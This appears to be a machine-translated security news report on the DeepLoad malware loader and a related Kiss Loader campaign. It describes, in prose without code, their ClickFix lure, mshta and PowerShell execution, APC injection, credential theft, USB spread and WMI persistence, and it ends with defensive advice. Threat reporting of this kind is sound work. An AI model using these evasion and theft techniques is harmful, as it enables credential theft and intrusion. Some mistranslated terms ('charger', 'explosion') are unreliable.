DeepLoad: the charger hidden in Windows that steals credentials and evades detection

In recent months a campaign has emerged that combines ingenious social engineering with advanced stealth techniques to spread a new malware charger named DeepLoad. What makes it particularly worrying is not only its intrusion capacity, but the deliberate way it tries to camouflage between legitimate Windows processes and avoid both static analysis and many usual security controls., according to researchers who have documented the threat.

The point of entry is not a sophisticated explosion but a psychological trap: a variant of the decoy known as "ClickFix," which persuades the victim to stick and execute a command in the Run Windows box with the excuse of fixing an alleged non-existent problem. This command invokes mshta.exe, a legitimate system utility that you download and run an ofuscado PowerShell script. The use of mshta to run payloads has been described by analysts as an example of "Signed Binary Proxy Execution," a technique that abuses reliable system binaries to run malicious code ( MITRE ATT & CK - mshta). To understand how mshta works on Windows you can see the official Microsoft documentation ( mshta - Microsoft Docs).

Once in operation, the loader shows a calculated pattern of evasion: its code is deliberately full of assignments and meaningless names to hide the real logic and confuse static signatures. The analysts who investigated the finding believe that the attackers relied on artificial intelligence tools to generate that outflow layer, a trend that is gaining strength in the malware scene because it allows to produce "noisy" and variable code with little human effort. DeepLoad also avoids leaving easily detectable traces, using techniques such as disabling PowerShell's command history and, instead of invoking standard cmdlets, calling directly to Windows's native functions to create processes and manipulate memory, which dodges many tracks that monitor PowerShell activity.

The charger also pulls tricks to make your binary confused with legitimate system components: it embodies the load into an executable with a name that makes you think of the Windows lock screen manager, and makes up a second piece dynamically using PowerShell's capacity Add-Type to compile and run C # code in memory. That operation produces a temporary DLL written in the Temp folder with changing names each run, making it difficult to detect based on signatures or repeated file names. Add-Type documentation in PowerShell is a good reference point to understand how this functionality is used ( Add-Type - Microsoft Docs).

In the main payload execution phase, DeepLoad uses injection by Asynchronous Procedure Call (APC), a way to run code within reliable processes. The routine is to launch an objective process in suspended state, write shellcode directly into your memory and resume it, thus avoiding leaving a decoded executable on disk. Process injection techniques such as this are included in the categories described by MITRE under "Process Injection" ( MITRE ATT & CK - Process Injection), and its use reduces visibility against traditional controls that seek files or typical PowerShell calls.

The functional goal of malware is not only to persist: it is aimed at exfiltration of credentials. Extract passwords stored in browsers and leave a malicious extension that captures credentials in real time when users fill in access forms, as well as stay resident between sessions. It also incorporates a removable media propagation mechanism that copies direct accesses with attractive names - for example, shortcuts that simulate browser installers or remote support tools - to induce the execution when another double user clicks the file on a different machine.

Silent persistence is another point to highlight: DeepLoad makes use of Windows Management Instrumentation (WMI) to re-inject into systems that seemed "clean" days later, without further interaction of the attacker. WMI allows you to create subscriptions to events that trigger the subsequent execution of the malicious code and, by the way, break the padre- child chains of processes that many detection rules track, making it difficult to follow the classic malicious activity ( MITRE ATT & CK - WMI).

The portrait that results from all these techniques is that of a multi-purpose charger designed to operate furtively, move quickly and provide the attackers with credentials theft, lateral movement and remote execution, all while reducing the detection surface by avoiding obvious devices on disk and mimicking themselves with system processes.

While research on DeepLoad was made public, another security house described a parallel campaign that reuses Internet shortcuts (.url files) as an initial vector. In that case, a loader called Kiss Loader was being distributed through phishing emails linking WebDAV resources to domains hosted by TryCloudflare. The initial shortcut downloads another direct access that is passed through a PDF; when it is run, it launches a WSH script that runs JavaScript, then a batch file that shows a PDF decoy, sets persistence in the Start folder and downloads a charger written on Python. This loader finally disfigures and runs a variant of RAT (Venom / AsyncrAT) also using APC for injection. The security signature behind the report provided details of this process and its stages of delivery and persistence.

These incidents highlight a number of lessons for defenders and security officials. On the one hand, the growing sophistication of ofuscation, probably assisted by IA tools, embodies the work of solutions based exclusively on static signatures. On the other hand, the exploitation of legitimate profits from Windows and mechanisms such as WMI or mshta underlines the importance of combining prevention controls with advanced telemetry that detect anomalous behaviors and correlate signals over time. Attention to WMI subscriptions, execution from temporary locations, the emergence of unusual child processes and monitoring the creation of DLs or memory injections are elements that should be given priority in detection policies.

If the reports and technical analysis are to be further developed, it is useful to review the documentation and reports published by the analysis companies that have investigated these cases. ReliaQuest's corporate page and specialized media have collected the findings on DeepLoad, while signatures like G DATA have documented Kiss Loader and his delivery chain. For general consultation on the technical techniques used, reference should be made to consolidated resources such as MITRE ATT & CK and Microsoft official documentation on the tools and APIs involved ( ReliaQuest, The Hacker News, G DATA, MITRE ATT & CK, Microsoft Docs).

The conclusion for security officials and users is clear: it is not enough to rely on file and signature-based blocks. Effective defense must incorporate behavior controls, privilege segmentation, restrictions on system utilities from unexpected contexts and continuous user education to resist social engineering traps. The threat landscape is becoming more dynamic and automated; adapting to that reality is no longer optional, it is urgent.